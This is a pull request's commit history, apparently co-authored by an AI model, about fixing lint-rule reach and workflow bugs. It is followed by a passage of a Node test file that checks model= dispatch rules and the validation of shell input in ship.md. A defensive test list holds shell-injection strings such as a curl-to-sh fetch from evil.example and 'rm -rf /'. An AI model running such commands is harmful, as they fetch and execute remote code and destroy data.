* fix(#3951): two lint rules that could not reach the code they govern B6 names two widenings. Measuring them first turned up a defect the criterion did not know about, and refuted the reason it gave for one of them. 1. no-adhoc-markdown-parsing self-gates on its own filename. Lines 107-110 short-circuit create() to {} unless the path matches /(?:^|\/)src\/[^/]+\.cts$/. B6 says to widen the files: glob in eslint.config.mjs - but doing only that ships an INERT rule, because the gate still returns {} for every new path. Both halves have to change, and the gate is the load-bearing one. That same regex hides a live hole: [^/]+ is FLAT-ONLY, so it requires the file to sit directly in src/. The registered glob is src/**/*.cts, which includes subdirectories. 28 .cts files - health-diagnostic-rules/ (10), installer-migrations/ (11), observability/ (3), host-integration-adapters/ (2), vendor/ (2) - are inside the registered glob and silently skipped. Measured with the gate neutralized: 0 violations there today. The hole is hiding nothing right now, and is fixed anyway, because "no violations today" is not a property that keeps holding. The fix is not invented: require-subprocess-timeout.cjs:196 already carries the correct form of this guard, /(?:^|\/)src\/.*\.cts$/ with .*, one directory over. Checked the other 21 rules for the same bug - no-adhoc-regex-escape and no-private-binary-resolution short-circuit only to exempt their own seam file, which is the right shape, and no-crlf-fragile-split has no filename gate at all. This bug is unique to the one rule. 2. no-adhoc-regex-escape could not see the shape that actually occurs. Line 396 gated the whole UNSAFE-NEW-REGEXP arm on arg.type === 'Identifier'. Every check below it - the _SOURCE provenance check, the isSoleReturnOfOwnParameter shape - lives inside that branch, so new RegExp(obj['key']) and new RegExp(cfg.pattern) were never examined at all. Runtime data arrives as a property access far more often than as a bare identifier, which is exactly why this rule never fired on the #3477 ReDoS. Widened to MemberExpression, measured by AST walk across all five registered blocks rather than by grep. 27 sites, zero TSAsExpression: 18 safe new RegExp(X.source, flags) -> exempted, keyed strictly on the PROPERTY being `source`, never on the object. Keying on the object would wave through X.anything and buy nothing. B6 estimated ~10; that was an undercount. 3 _SOURCE-suffixed constants reached through a required module namespace (phaseId.BRACKET_PHASE_TOKEN_SOURCE) -> the same provenance-exempt class the rule already recognizes for bare identifiers, extended to reach them. Without this the widening produces 3 false flags. 6 real findings -> marked, each a test extracting a pattern from a shipped file at test time, where the runtime contract IS the product. Deliberately the NARROW MemberExpression form. The rule's own isSoleReturnOfOwnParameter doc comment records that an earlier broad "any non-literal identifier" heuristic produced ~25 false positives and was rejected; a re-run of the census after this change flags exactly the 6 above and nothing else. Verified by execution, not by reading: the gate now accepts src/<subdir>/x.cts, still accepts flat src/x.cts, and still exempts paths outside src/ - each pinned by a test proven to fail against the old regex. build:lib, lint and lint:ci all exit 0. Refs #3951 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * fix(#3951): give no-adhoc-markdown-parsing its reach, and fix the 80 parses it finds The rule self-gates on filename AND is registered on one glob, so widening either half alone is inert. Both move here: the gate now accepts tests/**/*.cjs and scripts/**/*.cjs alongside src/**/*.cts, and eslint.config.mjs registers it on the same two. A test pins that the gate and the registration AGREE, in both directions. The original defect was a gate narrower than its registration; the failure mode of this fix is a gate wider than its registration. Both are silent, so the test asserts the pair rather than either half. 80 violations across 43 files, all in tests/, zero in scripts/. 70 are routed through the existing seams - scanFencedBlocks, collectSection, stripFencedCode, tokenizeHeadings from markdown-sectionizer; splitTableRow, parseMarkdownTable, findTableWithColumns from markdown-table. Headerless STATE.md tables use splitTableRow per line, because parseMarkdownTable needs a real delimiter row. 10 are suppressed, 12.5%, well under the third that would have meant the rule is mis-scoped for tests/ rather than the tests carrying debt. Each names its reason: three regression guards (#3873 / bug-#21) are deliberately independent of the generator's own fence handling, and routing them through the seam would have them test the generator against itself; one is a negative-text probe that extracts nothing; six are a shell-pipe-to-jq detector whose regex coincidentally matches the table fingerprint and is not markdown parsing at all. All ten sit in tests whose subject is .md content, which is normally a reason to prefer the seam. The marker used is allow-adhoc-markdown, distinct from no-source-grep's allow-test-rule, and lint:ci's lint-allow-test-rule-refs reports the same 280/280 unverified count as before - checked rather than assumed, because those two markers are easy to conflate. The widening earned its keep immediately: it found a test that passed for the wrong reason. tests/config-field-docs.test.cjs asserted notEqual(<cell>, '600') against the TYPE column instead of the DEFAULT column. notEqual('number', '600') is true forever, so the guard against workflow.subagent_timeout regressing to the old seconds default could never fire. docs/CONFIGURATION.md:434 is `| workflow.subagent_timeout | number | 300000 | ... |`, so the default is cell index 2; the assertion is now row-scoped through splitTableRow and reads 300000. That is the argument for the widening in one case: the violation was invisible to lint, the suite was green, and the assertion was vacuous. A rule that cannot reach a file cannot tell you the file is lying. Not fixed here, and recorded rather than assumed: #3426/#3239 are NOT reachable by this widening. tests/package-legitimacy-gate.test.cjs yields zero violations even with the gate bypassed - its hand-rolled scans are real, but built from line filters and split('|') rather than the regex-literal fingerprints this rule detects. They need new detectors. The epic assumed a wider glob would catch them. build:lib, lint and lint:ci all exit 0; the post-fix census across tests/** and scripts/** is 0 violations. Refs #3951 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * fix(#3951): B7 — and #3356's defects were still live in the code B7 asks that each closed child be driven fail-first with a behavioral identity test at the CONSUMER's output. Four of eleven children had no test citing their issue number. Auditing them by BEHAVIOR rather than by number-grep changed the answer for three of the four. #3364 and #2540 — traceability only. Both were implemented by #3941 and their consumer-output tests exist and were shown failing-first; neither cited its originating issue, so an audit that greps for the number reports them uncovered. Tagged the specific asserting test in each file, following the citation form those files already use. #3372 — covered, but only at helper level, and the triage narrowed it. Of the four commands the issue names, only estimate-cli's collectCalibrationSamples actually enumerates phase dirs from disk; smart-entry, audit and roadmap-upgrade derive from ROADMAP/body text and never reach the sentinel path, so they are benign by construction and were left alone rather than "fixed" into churn. The existing #3882 rows asserted the helper's return value. Added a consumer-output test driving `query estimate-calibrate` and asserting sample_count and the persisted document. RED proof: reverted collectCalibrationSamples to a raw readdirSync and ran the real CLI - sample_count 3, sentinel leaked; restored - sample_count 2. #3356 — NOT covered, and BOTH halves of the defect were still live in source. The issue is closed; the bug was not fixed. Fixed here rather than writing tests that document a bug as correct. Defect 1, the contradicted row. quick.md:627 claimed `quick-tasks-append` performs "the equivalent write" to the Step 7c row. It did not: the `#` cell was a positional ordinal and `Directory` read `—`, because the route had no way to receive a quick id or task directory. Added OPTIONAL `--quick-id` / `--slug` / `--directory`. A caller with neither - fast.md, the original #2133 caller - omits them and gets the byte-identical prior row, so nothing existing changes. A caller that HAS a real id and directory now gets the canonical row quick.md:632 renders. The false-equivalence sentence itself is corrected rather than left to mislead the next reader. Defect 2, the forced re-derive. The route called readModifyWriteStateMd with no options, so a body-only append to the Quick Tasks table triggered a full re-derive of the disk-derived progress.* frontmatter. Every other body-only writer passes { resync: false } - src/state.cts's own docstring prescribes it - and this route was the lone outlier. RED proof: reverted the option, seeded a project with 2 real phase dirs and a curated total_phases of 25, ran quick-tasks-append; total_phases collapsed to 2. Restored; it stayed 25. That second one is the shape this epic exists to close: a silent write that replaces curated state with a re-derivation nobody asked for, exit 0 throughout. build:lib, lint and lint:ci all exit 0. Refs #3951 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * docs(#3951): amend B6's ledger to what was measured, and document the new flags The ADR gains a ledger amendment in its own correction style - the sixth wrong premise it records, found the same way as the other five, by measuring before building. B6 says the net guard count must fall. It rose: 62 -> 69, +7, measured from the epic's filing commit to origin/next. The attribution is the point, though. Five of the seven came from PRs unrelated to this epic, one was added by a phase of it, and the epic did retire something sub-file - #3884 removed a detector with an explicit "net: -1 detector, 0 added" ledger. Every named casualty is load-bearing, two already carry retractions in this same document, and a sweep of all 22 rules plus every scripts/lint-* found no provably dead guard. There is no honest way to make the count fall; forcing it would trade coverage for a number, which is the Goodhart outcome Decision 6 exists to prevent. The amendment also records that B6's own prescribed fix for one widening was inert. no-adhoc-markdown-parsing self-gates on its filename, so widening only the files: glob - which is what the criterion says to do - ships a rule that still returns {} for every new path. And #3426/#3239 are not reachable by that widening at all; their scans use line filters and split('|'), not the regex fingerprints the rule detects. The roster row tracked them against the wrong mechanism. Three roster rows updated from aspiration to fact: the two widenings are DONE with their measured counts, and lint-phase-enumeration-drift is marked RETAINED rather than "expected casualty - verify before retiring", because Phase 5 verified it and kept it. The rule Decision 6 should carry forward is stated plainly: a guard ledger is a claim about COVERAGE, not about COUNT. "Net count must fall" is measurable and wrong. "Every guard is reachable, and each retirement names what makes its defect unrepresentable" is the property that was actually wanted. CLI-TOOLS.md documents the optional --quick-id/--slug/--directory flags and says plainly that omitting them keeps the pre-#3356 row byte-identical, plus that the append no longer re-derives progress frontmatter. New features fragment (id 3951); FEATURES.md regenerated rather than hand-edited. Changeset is Changed, pr:0 pending backfill. Refs #3951 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * test(#3951): correct four rows that pinned the lint rule's old narrow reach The remote suite came back RED with 5 failures, all in tests/eslint-rules.test.cjs. They are stale tests, not a regression: four rows assert that no-adhoc-markdown-parsing is inert outside src/*.cts, which is exactly the contract this deliverable changes. Confirmed by reading rather than inferred from the names - the row at :1981 used filename: 'tests/some.test.cjs' and filename: 'scripts/helper.cjs', the two roots the rule now covers on purpose. Worth recording WHY local gates missed this. npm run lint and lint:ci were green, and the touched test files passed standalone. Lint only reports violations in real files; these rows assert the rule's REACH using synthetic RuleTester filenames, so nothing but the full suite could see them. Local green on a rule change says nothing about the rule's own tests. Each row is rewritten with BOTH halves rather than flipped from valid to invalid: - the same fingerprint under tests/ or scripts/ is now flagged, with the right messageId - the negative space is preserved - the same fingerprint under a path outside all three roots (gsd-core/bin/lib/foo.cjs) is still NOT flagged The second half is the one that matters. Without it the rule has no boundary and nothing would catch an over-wide gate later, which is the mirror image of the bug this deliverable just fixed. Each row is renamed to state the current contract; the old names said "non-src/*.cts ... is not flagged" and would have been actively misleading once the bodies changed. Proven to test the widening rather than restate it: every flagged half was run against HEAD~2's pre-widening rule and does NOT fire there, then against the current rule and does. 12/12 on that probe; the full file is 178/178. Swept for the same staleness elsewhere and found none. require-subprocess-timeout's own "inert outside src/*.cts" row is untouched - that rule's gate was not widened here - and no-adhoc-regex-escape's test file already carries correctly-targeted rows. Refs #3951 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * test(#3951): acknowledge the quick.md growth the attribution guard reported The full suite came back RED with one failure, and it is mine: 1 file(s) grew without an acknowledgment: quick.md grew 364 bytes gsd-core/workflows/quick.md is runtime-loaded emitted content, so correcting its false 'performs the equivalent write' claim trips emitted-attribution by construction. This is the acknowledgment, not a workaround - there is nothing to regenerate. The fragment names ONE path, which is the only one the guard reported. The four spent acknowledgments it also listed (audit-uat, plan-phase, progress, review) belong to other fragments whose ripple the base already absorbs; they are inert, not failures, and are deliberately NOT copied here - naming paths I did not change would make this record false in the other direction. Byte figure corrected before committing: the guard reported 37220 -> 37584 (+364), but origin/next has since moved and quick.md is 37232 there now, so the measured delta is +352. The reason text says so and names the base as a moving figure rather than pinning a number that is already stale. Refs #3951 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * test(#3951): move the quick.md growth ack to a trailer, delete the obsolete fragment The acknowledgment mechanism changed under this branch. Merging next brought in the redesign - it also deleted .github/workflows/ack-fragment-sweep.yml, which was in the merge status and which I did not register at the time - and the guard now says so directly: Add a trailer to a commit in this PR (never a new file). Emitted-Drift-Ack-Growth: quick.md - <why this growth is deliberate> So tests/emitted-drift-acks/3951-quick-append-equivalence.json is obsolete on arrival. A fragment file is no longer read by anything, and leaving it would be a dead record that looks like an active one. It is deleted here rather than kept "just in case". The byte figure moved again with the merge: 37232 -> 37596, +364. The earlier fragment said +352, measured before the merge auto-merged quick.md itself. The trailer carries no number, which is the better design - the figure was stale twice in two attempts. Refs #3951 Emitted-Drift-Ack-Growth: quick.md — #3356/#3951 replaces a false claim with an accurate one. Line 627 said the `quick-tasks-append` shortcut "performs the equivalent write" to the Step 7c row rendered above it; it did not, and that was the documented half of #3356 — with no quick id or task directory the route emitted a positional ordinal in `#` and an em-dash in `Directory`, a visibly different row. The corrected sentence has to carry three facts the original elided: what the shortcut actually writes when it has neither input, that this is honest behavior for its real caller (`fast.md`, which has neither), and how a caller with both now gets the byte-identical canonical row via the new optional `--quick-id`/`--slug`/`--directory` flags. Prose is the product here — an executing agent reads this line to decide whether the shortcut is safe for its case, and a shorter correction would either drop the flags (leaving the reader unable to act on the fix) or drop the limitation (recreating the false claim in gentler words). Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * chore(#3951): backfill changeset pr number Refs #3951 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> --------- Co-authored-by: sim <sim@local> Co-authored-by: Claude Opus 5 <noreply@anthropic.com>
659 lines
29 KiB
JavaScript
659 lines
29 KiB
JavaScript
// allow-test-rule: structural-regression-guard see #2517
|
|
// allow-test-rule: source-text-is-the-product see #2684
|
|
// Guards the omit-when-inherit fix: workflow orchestrators must instruct the agent to
|
|
// OMIT the model= param from Agent() calls when the *_model var is "inherit" or empty.
|
|
// Without it, model="" is passed verbatim and 404s on non-Claude runtimes
|
|
// (resolve_model_ids:"omit" + model_profile:"inherit" -> empty model string).
|
|
// execute-phase had the fix; plan-phase was missing it (#2517); scan/ship dispatched with
|
|
// a placeholder their own init payload never emits at all (#2684).
|
|
'use strict';
|
|
|
|
const { test } = require('node:test');
|
|
const assert = require('node:assert/strict');
|
|
const fs = require('node:fs');
|
|
const path = require('node:path');
|
|
const fc = require('./helpers/fast-check-setup.cjs');
|
|
const { runGsdTools, createTempProject, cleanup, readWorkflowCombined } = require('./helpers.cjs');
|
|
const { escapeRegex } = require('../gsd-core/bin/lib/pattern.cjs');
|
|
|
|
const ROOT = path.resolve(__dirname, '..');
|
|
const WORKFLOWS = path.join(ROOT, 'gsd-core', 'workflows');
|
|
|
|
/**
|
|
* Does this body state the omit rule? The rule is "omit the model= param when the
|
|
* bound *_model is inherit/empty", so require `omit` adjacent to `model=` AND the
|
|
* word `inherit`. Deliberately a PROPERTY check, not a fixed template string:
|
|
* plan-phase.md and execute-phase.md each state it in their own wording and both
|
|
* are correct.
|
|
*/
|
|
const OMIT_RULE_MARKER = "<!-- #2517 model-omit-on-inherit -->";
|
|
|
|
function statesOmitRule(content) {
|
|
// Canonical form: the marker block, which links the rule's single source of truth.
|
|
// Preferred for new files because it is unambiguous and greppable, and because it
|
|
// carries no literal `model=` token — the installed Hermes copy of a workflow is
|
|
// asserted to contain none outside string literals (delegate_task has no per-call
|
|
// model parameter at all), so the older phrasing cannot be used everywhere.
|
|
if (content.includes(OMIT_RULE_MARKER)) return true;
|
|
// Legacy form: the rule stated inline in the file's own words. All four files that
|
|
// predate the marker (plan-phase, execute-phase, scan, ship) match this branch, and
|
|
// rewriting them to a template would churn correct files for no behavioral gain.
|
|
const omitNearModel = /omit[\s\S]{0,200}model=|model=[\s\S]{0,200}omit/i.test(content);
|
|
return omitNearModel && /inherit/i.test(content);
|
|
}
|
|
|
|
/**
|
|
* #2711 — the guarded set is DERIVED from the corpus: every workflow that emits a
|
|
* `model="{…}"` dispatch site must carry the rule.
|
|
*
|
|
* This replaces a hand-maintained array. That array was a Goodhart metric — it
|
|
* reported green across 15 non-compliant files for no better reason than that
|
|
* nobody had added them to it. Deriving the set is what makes a 16th file
|
|
* impossible to add silently.
|
|
*
|
|
* #2994: `content` is read via `readWorkflowCombined` (host + its
|
|
* `workflows/<wf>/steps/*.md` fragments), not the bare host file. The
|
|
* fragment model can move a workflow's own omit-rule prose (e.g.
|
|
* quick.md's rule lives in `quick/steps/research-phase.md` behind a
|
|
* `<!-- gsd:section -->` stub) out of the host without moving its
|
|
* `model="{…}"` dispatch site, so a host-only read would report a
|
|
* false positive for a workflow that still documents the rule.
|
|
*/
|
|
function workflowsThatDispatchWithAModel() {
|
|
return fs
|
|
.readdirSync(WORKFLOWS)
|
|
.filter((f) => f.endsWith('.md'))
|
|
.map((f) => ({ file: f, content: readWorkflowCombined(path.join(WORKFLOWS, f)) }))
|
|
.filter((w) => /model="\{/.test(w.content));
|
|
}
|
|
|
|
test('#2517: every workflow that dispatches model= documents omitting it on inherit/empty', () => {
|
|
const dispatching = workflowsThatDispatchWithAModel();
|
|
|
|
// Non-vacuity: an empty or truncated derivation is not a passing guard.
|
|
assert.ok(
|
|
dispatching.length >= 19,
|
|
`expected >=19 model=-dispatching workflows, derived ${dispatching.length} — ` +
|
|
'the derivation itself is broken, so this guard proves nothing.',
|
|
);
|
|
|
|
// Report ALL offenders in one message rather than stopping at the first, so a
|
|
// sweep can be completed in a single pass.
|
|
const missing = dispatching.filter((w) => !statesOmitRule(w.content)).map((w) => w.file);
|
|
assert.deepEqual(
|
|
missing,
|
|
[],
|
|
`these workflows dispatch model="{…}" but never tell the orchestrator to OMIT the ` +
|
|
`model= param when the bound *_model is "inherit" or empty (#2517/#2711):\n ` +
|
|
`${missing.join('\n ')}\n` +
|
|
'Without the rule, model="" is passed verbatim and 404s on every runtime lacking ' +
|
|
'native tier aliases — which is the DEFAULT state on non-Claude runtimes, where ' +
|
|
'the installer writes resolve_model_ids:"omit". See ' +
|
|
'gsd-core/references/model-profile-resolution.md.',
|
|
);
|
|
});
|
|
|
|
test('#2711: the guarded set is derived from dispatch sites, not hand-maintained', () => {
|
|
const derived = workflowsThatDispatchWithAModel().map((w) => w.file);
|
|
|
|
// limit: a workflow with exactly one dispatch site is still guarded.
|
|
assert.ok(derived.includes('audit-milestone.md'), 'a single-site workflow must be derived in');
|
|
// limit+1: a many-site workflow appears once, not once per site.
|
|
assert.equal(
|
|
derived.filter((f) => f === 'docs-update.md').length,
|
|
1,
|
|
'a workflow with 10 dispatch sites must be derived exactly once',
|
|
);
|
|
// limit-1: a workflow that never emits model= must NOT be dragged in.
|
|
const nonDispatching = fs
|
|
.readdirSync(WORKFLOWS)
|
|
.filter((f) => f.endsWith('.md') && !/model="\{/.test(fs.readFileSync(path.join(WORKFLOWS, f), 'utf8')));
|
|
assert.ok(nonDispatching.length > 0, 'expected some workflows to dispatch no model= at all');
|
|
for (const f of nonDispatching) {
|
|
assert.ok(!derived.includes(f), `${f} emits no model= and must not be required to carry the rule`);
|
|
}
|
|
});
|
|
|
|
test('#2711: detects a dispatching workflow that lacks the rule', () => {
|
|
const site = 'Agent(subagent_type="gsd-planner", model="{planner_model}")';
|
|
|
|
assert.equal(statesOmitRule(`# doc\n${site}\n`), false, 'a bare dispatch site must be reported');
|
|
|
|
// plan-phase.md's own wording — the guard checks the property, not a template.
|
|
const planPhaseWording =
|
|
'**#2517:** omit the `model=` param from an `Agent()` call when its ' +
|
|
'`researcher`/`planner`/`checker`_model is `"inherit"` or empty.';
|
|
assert.equal(statesOmitRule(`# doc\n${planPhaseWording}\n${site}\n`), true);
|
|
|
|
// execute-phase.md's differently-worded copy must also satisfy it.
|
|
const executePhaseWording =
|
|
'**Model resolution:** If `executor_model` is `"inherit"`, omit the `model=` ' +
|
|
'parameter from all `Agent()` calls.';
|
|
assert.equal(statesOmitRule(`# doc\n${executePhaseWording}\n${site}\n`), true);
|
|
|
|
// "omit" alone, with no mention of inherit, is not the rule.
|
|
assert.equal(statesOmitRule(`# doc\nomit the \`model=\` param sometimes.\n${site}\n`), false);
|
|
});
|
|
|
|
test('#2711: rule detection is CRLF-safe', () => {
|
|
const body = [
|
|
'# doc',
|
|
'**#2517:** omit the `model=` param when the bound `planner_model` is `"inherit"` or empty.',
|
|
'Agent(subagent_type="gsd-planner", model="{planner_model}")',
|
|
'',
|
|
];
|
|
assert.equal(statesOmitRule(body.join('\n')), true);
|
|
assert.equal(
|
|
statesOmitRule(body.join('\r\n')),
|
|
statesOmitRule(body.join('\n')),
|
|
'CRLF input must yield the same verdict as LF (recurring class: #1658/#1668/#2206/#2449/#2450)',
|
|
);
|
|
});
|
|
|
|
// ---------------------------------------------------------------------------
|
|
// #2684 — placeholder binding.
|
|
//
|
|
// A dispatch site may only substitute a field its OWN workflow binds. Three
|
|
// binding sources, any one sufficient:
|
|
// (a) a shell assignment in the same file: NAME=$(gsd_run query resolve-model …)
|
|
// (b) a key actually emitted by an init surface the file queries (invoked for real)
|
|
// (c) the file's declared parse list ("Parse JSON for:" / "Extract from init JSON:")
|
|
// ---------------------------------------------------------------------------
|
|
|
|
/** All `model="{X}"` placeholder names in a workflow body. */
|
|
function extractModelPlaceholders(content) {
|
|
return [...content.matchAll(/model="\{([A-Za-z0-9_]+)\}"/g)].map((m) => m[1]);
|
|
}
|
|
|
|
/** `NAME=$(...)` shell assignments. `^`/`$` under /m are CRLF-safe; \s absorbs the \r. */
|
|
function shellAssignedNames(content) {
|
|
return new Set([...content.matchAll(/^[ \t]*([A-Za-z0-9_]+)=\$\(/gm)].map((m) => m[1]));
|
|
}
|
|
|
|
/** Init surfaces the file queries: both `init.<name>` and the `<name>-init` spelling. */
|
|
function queriedInitSurfaces(content) {
|
|
const dotted = [...content.matchAll(/query\s+(init\.[a-z0-9-]+)/g)].map((m) => m[1]);
|
|
const suffixed = [...content.matchAll(/query\s+([a-z0-9-]+-init)\b/g)].map((m) => m[1]);
|
|
return [...new Set([...dotted, ...suffixed])];
|
|
}
|
|
|
|
/** Names listed on a declared parse line. */
|
|
function declaredParseNames(content) {
|
|
const names = new Set();
|
|
const lines = /^.*(?:Parse JSON for|Parse from init JSON|Extract from init JSON).*$/gim;
|
|
for (const line of content.match(lines) || []) {
|
|
for (const m of line.matchAll(/`([A-Za-z0-9_]+)`/g)) names.add(m[1]);
|
|
}
|
|
// Multi-line declarations render the fields as a bullet list under the heading.
|
|
const bulleted = content.matchAll(
|
|
/(?:Parse JSON for|Parse from init JSON|Extract from init JSON)[^\n]*\n((?:[ \t]*[-*][^\n]*\n)+)/gi,
|
|
);
|
|
for (const m of bulleted) {
|
|
for (const b of m[1].matchAll(/`([A-Za-z0-9_]+)`/g)) names.add(b[1]);
|
|
}
|
|
return names;
|
|
}
|
|
|
|
const _initKeyCache = new Map();
|
|
/** Real payload keys for an init surface, or null when it needs args we cannot supply. */
|
|
function initPayloadKeys(surface) {
|
|
if (_initKeyCache.has(surface)) return _initKeyCache.get(surface);
|
|
let keys = null;
|
|
const res = runGsdTools(['query', surface], ROOT);
|
|
if (res.success) {
|
|
try {
|
|
keys = new Set(Object.keys(JSON.parse(res.output)));
|
|
} catch {
|
|
keys = null; // non-JSON payload — inconclusive, not proof of absence.
|
|
}
|
|
}
|
|
// A null here means the surface needs an argument we cannot supply (e.g. a
|
|
// phase number). Inconclusive, NOT proof the field is absent — the caller
|
|
// still has the declared-parse-list and shell-assignment binding sources.
|
|
_initKeyCache.set(surface, keys);
|
|
return keys;
|
|
}
|
|
|
|
/** Unbound `model="{X}"` names in one workflow body. */
|
|
function unboundModelPlaceholders(content, resolveInit = initPayloadKeys) {
|
|
const placeholders = new Set(extractModelPlaceholders(content));
|
|
if (placeholders.size === 0) return [];
|
|
const bound = new Set([...shellAssignedNames(content), ...declaredParseNames(content)]);
|
|
for (const surface of queriedInitSurfaces(content)) {
|
|
const keys = resolveInit(surface);
|
|
if (keys) for (const k of keys) bound.add(k);
|
|
}
|
|
return [...placeholders].filter((p) => !bound.has(p));
|
|
}
|
|
|
|
test('#2684: every model="{…}" placeholder resolves to a field its own workflow binds', () => {
|
|
const files = fs.readdirSync(WORKFLOWS).filter((f) => f.endsWith('.md'));
|
|
const findings = [];
|
|
let scanned = 0;
|
|
let placeholders = 0;
|
|
|
|
for (const file of files) {
|
|
const content = fs.readFileSync(path.join(WORKFLOWS, file), 'utf8');
|
|
const found = extractModelPlaceholders(content);
|
|
if (found.length === 0) continue;
|
|
scanned += 1;
|
|
placeholders += found.length;
|
|
for (const name of unboundModelPlaceholders(content)) {
|
|
findings.push(`${file}: model="{${name}}" — no init payload key, shell assignment, or ` +
|
|
`declared parse field of that name. The substitution has no source, so the ` +
|
|
`orchestrator invents a value (#2684, ADR-1411).`);
|
|
}
|
|
}
|
|
|
|
// Non-vacuity: a glob that silently stops matching must fail, not pass.
|
|
assert.ok(scanned >= 10, `expected to scan >=10 dispatching workflows, scanned ${scanned}`);
|
|
assert.ok(placeholders >= 20, `expected >=20 model= placeholders, found ${placeholders}`);
|
|
assert.deepEqual(findings, [], `unbound model= placeholders:\n ${findings.join('\n ')}`);
|
|
});
|
|
|
|
test('#2684: detects an unbound placeholder in a synthetic workflow', () => {
|
|
const noInit = () => null;
|
|
|
|
// limit-1 — zero placeholders.
|
|
assert.deepEqual(unboundModelPlaceholders('# doc\nno dispatch here\n', noInit), []);
|
|
|
|
// limit — exactly one, unbound.
|
|
const one = '# doc\nAgent(subagent_type="x", model="{ghost_model}")\n';
|
|
assert.deepEqual(unboundModelPlaceholders(one, noInit), ['ghost_model']);
|
|
|
|
// limit+1 — two unbound alongside one bound; only the unbound are reported.
|
|
const many = [
|
|
'# doc',
|
|
'REAL_MODEL=$(gsd_run query resolve-model gsd-planner --raw)',
|
|
'Agent(subagent_type="a", model="{REAL_MODEL}")',
|
|
'Agent(subagent_type="b", model="{ghost_one}")',
|
|
'Agent(subagent_type="c", model="{ghost_two}")',
|
|
'',
|
|
].join('\n');
|
|
assert.deepEqual(unboundModelPlaceholders(many, noInit), ['ghost_one', 'ghost_two']);
|
|
});
|
|
|
|
test('#2684: binding detection is CRLF-safe', () => {
|
|
const noInit = () => null;
|
|
const body = [
|
|
'# doc',
|
|
'BOUND_MODEL=$(gsd_run query resolve-model gsd-planner --raw)',
|
|
'Parse JSON for: `declared_model`.',
|
|
'Agent(subagent_type="a", model="{BOUND_MODEL}")',
|
|
'Agent(subagent_type="b", model="{declared_model}")',
|
|
'Agent(subagent_type="c", model="{ghost_model}")',
|
|
'',
|
|
];
|
|
const lf = body.join('\n');
|
|
const crlf = body.join('\r\n');
|
|
assert.deepEqual(unboundModelPlaceholders(lf, noInit), ['ghost_model']);
|
|
assert.deepEqual(
|
|
unboundModelPlaceholders(crlf, noInit),
|
|
unboundModelPlaceholders(lf, noInit),
|
|
'CRLF input must yield the same findings as LF — a hardcoded \\n strands the \\r ' +
|
|
'and turns a bound name unbound (recurring class: #1658/#1668/#2206/#2449/#2450).',
|
|
);
|
|
});
|
|
|
|
test('#2684: placeholder extraction round-trips (property)', () => {
|
|
const ident = fc.stringMatching(/^[A-Za-z_][A-Za-z0-9_]{0,20}$/);
|
|
fc.assert(
|
|
fc.property(fc.array(ident, { minLength: 1, maxLength: 12 }), (names) => {
|
|
const rendered = names.map((n) => `Agent(subagent_type="x", model="{${n}}")`).join('\n');
|
|
assert.deepEqual(extractModelPlaceholders(rendered), names);
|
|
}),
|
|
{ numRuns: 200 },
|
|
);
|
|
});
|
|
|
|
test('#2684: the model-profile reference does not instruct emitting an inherit/empty model=', () => {
|
|
const rel = 'gsd-core/references/model-profile-resolution.md';
|
|
const content = fs.readFileSync(path.join(ROOT, rel), 'utf8');
|
|
|
|
assert.ok(
|
|
!/model="inherit"/.test(content),
|
|
`${rel}: must not instruct passing model="inherit" — #2517 established that an ` +
|
|
`inherit/empty model 404s on non-Claude runtimes and must be OMITTED instead. ` +
|
|
`This shipped reference is copied into workflows verbatim.`,
|
|
);
|
|
assert.ok(
|
|
!/model="\{resolved_model\}"/.test(content),
|
|
`${rel}: must not ship a copy-pasteable model="{resolved_model}" — no init payload ` +
|
|
`emits that field, and this snippet is exactly what scan.md inherited (#2684).`,
|
|
);
|
|
assert.ok(
|
|
/omit/i.test(content),
|
|
`${rel}: must state the #2517 omit-on-inherit/empty rule, since it is the document ` +
|
|
`workflow authors copy their dispatch block from.`,
|
|
);
|
|
});
|
|
|
|
test('#2684: ship.md validates capability-supplied ref.agent before it reaches a shell', () => {
|
|
const content = fs.readFileSync(path.join(WORKFLOWS, 'ship.md'), 'utf8');
|
|
|
|
// `ref.agent` comes from a capability manifest, which may be third-party. The
|
|
// #2684 fix is the first place that value reaches a shell command, so the
|
|
// workflow must constrain its shape BEFORE substituting it.
|
|
//
|
|
// The check must be performed in-context, not in the shell: the orchestrator
|
|
// substitutes the raw value textually, so a shell-side test would run only
|
|
// AFTER a payload like `x"; id; echo "` had already closed the assignment and
|
|
// executed. Assert the workflow states the in-context ordering explicitly.
|
|
// eslint-disable-next-line local/no-unbounded-quantifier -- parses maintainer-authored ship.md workflow, bounded prose, not adversarial input
|
|
const gate = /`(\^\[A-Za-z0-9\]\[[^`]*\]\*\$)`/.exec(content);
|
|
assert.ok(
|
|
gate,
|
|
'ship.md must publish the shape `ref.agent` has to match before it is used ' +
|
|
'— a capability manifest is not trusted input.',
|
|
);
|
|
assert.match(
|
|
content,
|
|
/IN-CONTEXT, before any shell use/i,
|
|
'ship.md must require the ref.agent check to run in-context BEFORE any shell ' +
|
|
'use. A shell-side check runs after the injection point and protects nothing.',
|
|
);
|
|
assert.doesNotMatch(
|
|
content,
|
|
/HOOK_AGENT="/,
|
|
'ship.md must not assign the raw ref.agent value into a shell variable — that ' +
|
|
'assignment IS the injection point (#2684 isolated review).',
|
|
);
|
|
|
|
// Pattern extracted verbatim from ship.md's validation gate — the shipped
|
|
// regex IS the product under test (#3951).
|
|
const shape = new RegExp(gate[1]); // allow-adhoc-regex-escape: runtime-contract-is-the-product
|
|
|
|
// Legitimate agent names the capability system actually dispatches.
|
|
for (const ok of ['gsd-mempalace-curator', 'gsd-code-reviewer', 'my.agent_v2', 'a']) {
|
|
assert.ok(shape.test(ok), `validation gate must accept the real agent name ${ok}`);
|
|
}
|
|
|
|
// Shell-injection shapes a hostile or corrupted manifest could supply. Each
|
|
// must be rejected, so the hook is skipped rather than executed.
|
|
const hostile = [
|
|
'x"; curl http://evil.example/p | sh; #',
|
|
'x$(id)',
|
|
'x`id`',
|
|
'x; rm -rf /',
|
|
'x && whoami',
|
|
'x | tee /etc/passwd',
|
|
'x\nrm -rf /',
|
|
'$IFS',
|
|
'../../etc/passwd',
|
|
'',
|
|
];
|
|
for (const bad of hostile) {
|
|
assert.equal(
|
|
shape.test(bad),
|
|
false,
|
|
